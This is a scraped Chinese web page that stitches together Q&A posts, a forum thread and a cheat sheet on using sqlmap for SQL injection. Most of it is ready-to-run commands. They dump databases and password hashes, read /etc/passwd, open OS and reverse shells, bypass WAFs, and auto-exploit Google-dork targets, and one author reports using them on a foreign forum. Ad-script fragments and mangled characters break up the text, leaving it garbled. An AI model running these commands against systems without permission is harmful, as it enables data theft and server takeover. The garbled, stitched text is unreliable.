sqlmap 注入参数url 后面必须加参数么

SQLMAP的部分用法
内容摘自网络,整理:mer4en7y
1)判断当前用户是否是dba
python sqlmap.py -u &url& --is-dba -v 1
2)--users:列出管理系统用户
python sqlmap.py -u &url& --users -v 0
3)--passwords:数据库用户密码(hash)
python sqlmap.py -u &url& --passwords -v 0
python sqlmap.py -u &url& --passwords -U sa -v 0
4)查看用户权限
python sqlmap.py -u &url& --privileges -v 0
python sqlmap.py -u &url& --privileges -U postgres -v 0
5)--dbs可以利用的数据库
python sqlmap.py -u &url& --dbs -v 0
6)--tables列数据库表
python sqlmap.py -u &url& --tables -D &information_scheam&
-D:指定数据名称
7)--columns 列出表中的列名
python sqlmap.py -u &url& --columns -T &user& -D && -v 1
-T:指定表名,-D:指定库名
8)--dump列表中指定列的内容
python sqlmap.py -u &url& --dump -T &users& -D &testdb&
-C:可以指定字段
指定列的范围为2到4
python sqlmap.py -u &url& --dump -T &users& -D &testdb&& --start 2 --stop 4 -v 0
9)--dumap-all列出所有数据库,所有表内容
python sqlmap.py -u &url& --dump-all -v 0
只列出用户自己新建的数据库和表的内容
python sqlmap.py -u &url& --dump-all --exclude-sysdbs -v 0
10)--file读取文件内容[load_file()函数]
python sqlmap.py -u &url& --file /etc/password
11)执行SQL
python sqlmap.py -u &url& --sql-shell
12)-p 指定参数
python sqlmap.py -u &url& -v 1 -p &id&
-p可以指定多参数-p &cat,id&
13)POST提交
python sqlmap.py -u &url& --method POST --data &id=1&
14)COOKIE提交
python sqlmap.py -u &url& --cookie &id=1& -v 1
cookie值可以由TamperData抓取
15)refer欺骗
python sqlmap.py -u &url& --refer &url& -v 3
16)使用自定义user-agent或者user-agents.txt
python sqlmap.py -u &url& --user-agent &Mozilla/4.0 ( MSIE 7.0; Windows NT 5.1)& -v 3
python sqlmap.py -u &url& -v 1 -a &./txt/user-agents.txt&
17)使用多线程猜解
python sqlmap.py -u &url& -v 1 --current-user --threads 3
18)指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u &url& -v 2 --dbms &PostgreSQL&
19)指定操作绕过SQLMAP自动检测
python sqlmap.py -u &url& -v 2 --os &Windows&
20)--prefix and --postfix自定义payload
python sqlmap.py -u &url& -v 3 -p &id& --prefix &'& --postfix &and 'test'='test&
21)union注入测试
python sqlmap.py -u &url& --union-test -v -1
22)配合order by
python sqlmap.py -u &url& --union-test --union-tech orderby -v 1
23)python sqlmap.py -u &url& -v 1 --union-use --banner
24)python sqlmap.py -u &url& -v 5 --union-use --current-user
25)python sqlmap.py -u &url& -v 1 --union-use --dbs
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467142',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'sqlmap post注入怎么获取注入的参数_百度知道
sqlmap post注入怎么获取注入的参数
提问者采纳
  POST注入  有两种方法来进行post注入,一种是使用--data参数,将post的key和value用类似GET方式来提交。二是使用-r参数,sqlmap读取用户抓到的POST请求包,来进行POST注入检测。  查看payload  之前一直是加本地代理,然后用burpsuit来看sqlmap的payload,到现在才发现用-v参数就可以实现。一直认为-v实现的只是控制警告,debug信息级别。实际上使用-v 3就可以显示注入的payload,4,5,6还可以显示HTTP请求,HTTP响应头和页面。  使用google搜索  sqlmap可以测试google搜索结果中的sql注入,很强大的功能吧。使用方法是参数-g。不过感觉实际使用中这个用的还是很少的。  请求延时  在注入过程中请求太频繁的话可能会被防火墙拦截,这时候--delay参数就起作用了。可以设定两次HTTP请求间的延时。有的web程序会在多次错误访问后屏蔽所有请求,这样就导致之后所有的测试无法进行,绕过这个策略可以使用--safe-url,每隔一段时间去访问一个正常的页面。  伪静态页面  有些web服务器进行了url rewrite或者网站是伪静态的,无法直接提供测试参数,这样子可以使用*来代替要测试的参数。  执行系统命令  当数据库支持,并且当前用户有权限的时候,可以执行系统命令,使用--os-cmd或者--os-shell,具体的讲,当可以执行多语句的时候,会尝试用UDF(MySQL,PostgrepSQL)或者xp_cmdshell(M俯迹碘克鄢久碉勋冬魔SSQL)来执行系统命令。不能执行多语句时,仍然会尝试创建一个webshell来执行语句,这时候就需要web的绝对路径了。总体来说,成功率偏低,不过个人也有成功的经验~  测试等级  sqlmap使用--level参数来进行不同全面性的测试,默认为1,不同的参数影响了使用哪些payload,2时会进行cookie注入检测,3时会进行useragent检测。
资深电脑人
其他类似问题
为您推荐:
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁请问登录框的username参数存在sql注入该怎么用sqlmap_渗透吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:30,407贴子:
请问登录框的username参数存在sql注入该怎么用sqlmap收藏
就是这个漏洞,但是作者没说清楚有没有那位大牛教教我该怎么用这个漏洞
就是post注入
a.txt -p -字段名
sqlmap.py -u &网址& --data &username=admin&password=admin&
最简单的就是 sqlmap -u url --forms
不知道,混经验路过
应用吧活动,
应用吧活动,
登录百度帐号推荐应用
为兴趣而生,贴吧更懂你。或sqlmap注入命令的使用方法
今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、
sqlmap -u &http://url/news?id=1&P &current-user #获取当前用户名称sqlmap -u &/news?id=1&P &current-db #获取当前数 据库名称
sqlmap -u &/news?id=1&P &tables -D &db_name&#列 表名
sqlmap -u &http://url/news?id=1&P &columns -T &tablename&users-D &db_name&-v 0 #列字段
sqlmap& -u& &http://url/news?id=1&P& &dump& -C& &column_name&& -T &table_name&-D &db_name&-v
0 #获取字段内容
******************信息获取******************
sqlmap -u &http://url/news?id=1&P &dbms &Mysql& &users # dbms 指定数 据库类型
sqlmap -u &http://url/news?id=1&P &users #列数据库用户
sqlmap -u &http://url/news?id=1&P &dbs#列数据库
sqlmap -u &http://url/news?id=1&P &passwords #数据库用户密码
sqlmap -u &http://url/news?id=1&P &passwords-U root -v 0 #列出指定用户 数据库密码
sqlmap& -u& &http://url/news?id=1&P&& &dump& -C& &password,user,id&& -T &tablename&-D &db_name&
&start 1 &stop 20 #列出指定字段,列出20 条
sqlmap -u &http://url/news?id=1&P &dump-all -v 0 #列出所有数据库所有表
sqlmap -u &http://url/news?id=1&P &privileges #查看权限
sqlmap -u &http://url/news?id=1&P &privileges -U root #查看指定用户权限sqlmap -u &http://url/news?id=1&P &is-dba -v 1 #是否是数据库管理员sqlmap -u &http://url/news?id=1&P &roles #枚举数据库用户角色
sqlmap -u &http://url/news?id=1&P &udf-inject #导入用户自定义函数(获取 系统权限!)
sqlmap -u &http://url/news?id=1&P &dump-all &exclude-sysdbs -v 0 #列 出当前库所有表
sqlmap -u &http://url/news?id=1&P &union-cols #union 查询表记录
sqlmap -u &http://url/news?id=1&P &cookie &COOKIE_VALUE&#cookie注入
sqlmap -u &http://url/news?id=1&P-b #获取banner信息
sqlmap -u &http://url/news?id=1&P &data &id=3&P#post注入
sqlmap -u &http://url/news?id=1&P-v 1 -f #指纹判别数据库类型
sqlmap -u &http://url/news?id=1&P &proxy&http://127.0.0.1:8118& #代理注 入
sqlmap -u &http://url/news?id=1&P&string&STRING_ON_TRUE_PAGE&# 指 定关键词
sqlmap -u &http://url/news?id=1&P &sql-shell #执行指定sql命令
sqlmap -u &http://url/news?id=1&P &file /etc/passwd
sqlmap -u &http://url/news?id=1&P &os-cmd=whoami #执行系统命令
sqlmap -u &http://url/news?id=1&P &os-shell #系统交互shell sqlmap -u &http://url/news?id=1&P &os-pwn #反弹shell
sqlmap -u &http://url/news?id=1&P &reg-read #读取win系统注册表
sqlmap -u &http://url/news?id=1&P &dbs-o &sqlmap.log&#保存进度
sqlmap -u &http://url/news?id=1&P &dbs -o &sqlmap.log& &resume #恢复 已保存进度
***********高级用法*************
-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
sqlmap -g &google语法& &dump-all &batch #google搜索注入点自动 跑出 所有字段&&&&&&&&& 需保证能正常访问
&technique&& 测试指定注入类型\使用的技术
不加参数默认测试所有注入技术
&&&&& B: 基于布尔的SQL 盲注
&&&&& E: 基于显错sql 注入
&&&&& U: 基于UNION 注入
&&&&& S: 叠层sql 注入
&&&&& T: 基于时间盲注
&tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
&tamper 插件所在目录
\sqlmap-dev\tamper
sqlmap -u &http://
/news?id=1&P &smart &level 3 &users # smart 智 能
level 执行测试等级 攻击实例:
Sqlmap -u &http://url/news?id=1&Submit=Submit&
&cookie=&PHPSESSID=41aa833e6d0d
28f489ff1ab5a7531406&P &string=&Surname& &dbms=mysql &user
参考文档:http://sqlmap.sourceforge.net/doc/README.html
***********安装最新版本*************
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
sudo&& svn&& checkout&& https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py &version 这样很不方便 我们可以设置.bashrc 文件
sudo vim /home/当前用户/.bashrc
#任意位置加上:
alias sqlmap=&python /home/seclab/sqlmap-dev/sqlmap.py& 该环境变量只对当前用户有效
如果想对所有用户有效 可设置全局 编辑下面的文件
vim /etc/profile
同样加上:
alias sqlmap=&python /home/seclab/sqlmap-dev/sqlmap.py& 重启生效
******************windows 7 (x64) sqlmap install (SVN)************
http://www.python.org/getit/ 安装python
/en/download 安装windows svn client
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
安装sqlmap
*修改环境变量
&version&&&&&&&&&&&& 显示程序的版本号并退出
-h, &help&&&&&&&&&&& 显示此帮助消息并退出
-v VERBOSE&&&&&&&&&&& 详细级别:0-6(默认为1)
Target(目标): 以下至少需要设置其中一个选项,设置目标URL。
-d DIRECT&&&&&&&& &&直接连接到。
-u URL, &url=URL&& 目标URL。
-l LIST&&&&&&&&&&&& 从Burp 或WebScarab 代理的日志中解析目标。
-r REQUESTFILE&&&&& 从一个文件中载入HTTP 请求。
-g GOOGLEDORK&&&&&& 处理Google dork 的结果作为目标URL。
-c CONFIGFILE&&&&&& 从INI 配置文件中加载选项。
Request(请求)::
这些选项可以用来指定如何连接到目标URL。
&data=DATA&&&&&&&& 通过POST 发送的数据字符串
&cookie=COOKIE&&&& HTTP Cookie 头
&cookie-urlencode& URL 编码生成的cookie 注入
&drop-set-cookie&& 忽略响应的Set &Cookie 头信息
&user-agent=AGENT& 指定& HTTP User &Agent 头
&random-agent&&&&& 使用随机选定的HTTP User &Agent 头
&referer=REFERER&& 指定& HTTP Referer 头
&headers=HEADERS&& 换行分开,加入其他的HTTP 头
&auth-type=ATYPE&& HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
&auth-cred=ACRED&& HTTP 身份验证凭据(用户名:密码)
&auth-cert=ACERT&& HTTP 认证证书(key_file,cert_file)
&proxy=PROXY&&&&&& 使用HTTP 代理连接到目标URL
&proxy-cred=PCRED& HTTP 代理身份验证凭据(用户名:密码)
&ignore-proxy&&&&& 忽略系统默认的HTTP 代理
&delay=DELAY&&&&&& 在每个HTTP 请求之间的延迟时间,单位为秒
&timeout=TIMEOUT&& 等待连接超时的时间(默认为30 秒)
&retries=RETRIES&& 连接超时后重新连接的时间(默认3)
&scope=SCOPE&&&&&& 从所提供的代理日志中过滤器目标的正则表达式
&safe-url=SAFURL&& 在测试过程中经常访问的url 地址
&safe-freq=SAFREQ& 两次访问之间测试请求,给出安全的URL
Optimization(优化): 这些选项可用于优化SqlMap 的性能。
-o&&&&&&&&&&&&&&&&& 开启所有优化开关
&predict-output&&& 预测常见的查询输出
&keep-alive&&&&&&& 使用持久的HTTP(S)连接
&null-connection&& 从没有实际的HTTP 响应体中检索页面长度
&threads=THREADS&& 最大的HTTP(S)请求并发量(默认为1)
Injection(注入):
这些选项可以用来指定测试哪些参数,& 提供自定义的注入payloads 和可选篡改脚本。
-p TESTPARAMETER&&& 可测试的参数(S)
&dbms=DBMS&&&&&&&& 强制后端的DBMS 为此值
&os=OS&&&&&&&&&&&& 强制后端的DBMS 操作系统为这个值
&prefix=PREFIX&&&& 注入payload 字符串前缀
&suffix=SUFFIX&&&& 注入 payload 字符串后缀
&tamper=TAMPER&&&& 使用给定的脚本(S)篡改注入数据
Detection(检测):
这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。
&level=LEVEL&&&&&& 执行测试的等级(1-5,默认为1)
&risk=RISK&&&&&&&& 执行测试的风险(0-3,默认为1)
&string=STRING&&&& 查询时有效时在页面匹配字符串
&regexp=REGEXP&&&& 查询时有效时在页面匹配正则表达式
&text-only&&&&&&&& 仅基于在文本内容比较网页
Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。
&technique=TECH&&& SQL 注入技术测试(默认BEUST)
&time-sec=TIMESEC& DBMS 响应的延迟时间(默认为5 秒)
&union-cols=UCOLS& 定列范围用于测试UNION 查询注入
&union-char=UCHAR& 用于暴力猜解列数的字符
Fingerprint(指纹):
-f, &fingerprint &&&&执行检查广泛的DBMS 版本指纹
Enumeration(枚举):
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
-b, &banner&&&&&&& 检索数据库管理系统的标识
&current-user&&&&& 检索数据库管理系统当前用户
&current-db&&&&&&& 检索数据库管理系统当前数据库
&is-dba&&&&&&&&&&& 检测DBMS 当前用户是否DBA
&users&&&&&&&&&&&& 枚举数据库管理系统用户
&passwords&&&&&&&& 枚举数据库管理系统用户密码哈希
&privileges&&&&&&& 枚举数据库管理系统用户的权限
&roles&&&&&&&&&&&& 枚举数据库管理系统用户的角色
&dbs&&&&&&&&&&&&&& 枚举数据库管理系统数据库
&tables&&&&&&&&&&& 枚举的DBMS 数据库中的表
&columns&&&&&&&&&& 枚举DBMS 数据库表列
&dump&&&&&&&&&&&&& 转储数据库管理系统的数据库中的表项
&dump-all&&&&&&&&& 转储所有的DBMS 数据库表中的条目
&search&&&&&&&&&&& 搜索列(S),表(S)和/或数据库名称(S)
-D DB&&&&&&&&&&&&&& 要进行枚举的数据库名
-T TBL&&&&&&&&&&&&& 要进行枚举的数据库表
-C COL&&&&&&&&&&&&& 要进行枚举的数据库列
-U USER&&&&&&&&&&&& 用来进行枚举的数据库用户
&exclude-sysdbs&&& 枚举表时排除系统数据库
&start=LIMITSTART &第一个查询输出进入检索
&stop=LIMITSTOP&&& 最后查询的输出进入检索
&first=FIRSTCHAR&& 第一个查询输出字的字符检索
&last=LASTCHAR&&&& 最后查询的输出字字符检索
&sql-query=QUERY&& 要执行的SQL 语句
&sql-shell&&&&&&&& 提示交互式SQL 的shell
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。
&common-tables&&&& 检查存在共同表
&common-columns&& &检查存在共同列
User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
&udf-inject&&&&&&& 注入用户自定义函数
&shared-lib=SHLIB& 共享库的本地路径
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
&file-read=RFILE&& 从后端的数据库管理系统文件系统读取文件
&file-write=WFILE& 编辑后端的数据库管理系统文件系统上的本地文件
&file-dest=DFILE&& 后端的数据库管理系统写入文件的绝对路径
Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。
&os-cmd=OSCMD&&&&& 执行操作系统命令
&os-shell&&&&&&&&& 交互式的操作系统的shell
&os-pwn&&&&&&&&&&& 获取一个OOB shell,meterpreter 或VNC
&os-smbrelay&&&&&& 一键获取一个OOB shell,meterpreter 或VNC
&os-bof&&&&&&&&&&& 存储过程缓冲区溢出利用
&priv-esc&&&&&&&&& 数据库进程用户权限提升
&msf-path=MSFPATH& Metloit Framework 本地的安装路径
&tmp-path=TMPPATH& 远程临时文件目录的绝对路径
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理Windows 注册表。
&reg-read&&&&&&&&& 读一个Windows 注册表项值
&reg-add&&&&&&&&&& 写一个Windows 注册表项值数据
&reg-del&&&&&&&&&& 删除Windows 注册表键值
&reg-key=REGKEY&&& Windows 注册表键
&reg-value=REGVAL& Windows 注册表项值
&reg-data=REGDATA& Windows 注册表键值数据
&reg-type=REGTYPE& Windows 注册表项值类型
General(一般): 这些选项可以用来设置一些一般的工作参数。
-t TRAFFICFILE&&&&& 记录所有HTTP 流量到一个文本文件中
-s SESSIONFILE&&&&& 保存和恢复检索会话文件的所有数据
&flush-session&&&& 刷新当前目标的会话文件
&fresh-queries&&&& 忽略在会话文件中存储的查询结果
&eta&&&&&&&&&&&&&& 显示每个输出的预计到达时间
&update&&&&&&&&&&& 更新SqlMap
&save&&&&&&&&&&&&& file 保存选项到INI 配置文件
&batch&&&&&&&&&&&& 从不询问用户输入,使用所有默认配置。
Miscellaneous(杂项):
&beep&&&&&&&&&&&&& 发现SQL 注入时提醒
&check-payload&&&& IDS 对注入payloads 的检测测试
&cleanup&&&&&&&&&& SqlMap 具体的UDF 和表清理DBMS
&forms&&&&&&&&&&&& 对目标URL 的解析和测试形式
&gpage=GOOGLEPAGE& 从指定的页码使用谷歌dork 结果
&page-rank&&&&&&&& Google dork 结果显示网页排名(PR)
&parse-errors&&&&& 从响应页面解析数据库管理系统的错误消息
&replicate&&&&&&&& 复制转储的数据到一个sqlite3 数据库
&tor&&&&&&&&&&&&&& 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
&wizard&&&&&&&&&&& 给初级用户的简单向导界面
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467142',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'

我要回帖

更多关于 url问号后面的参数 的文章

 

随机推荐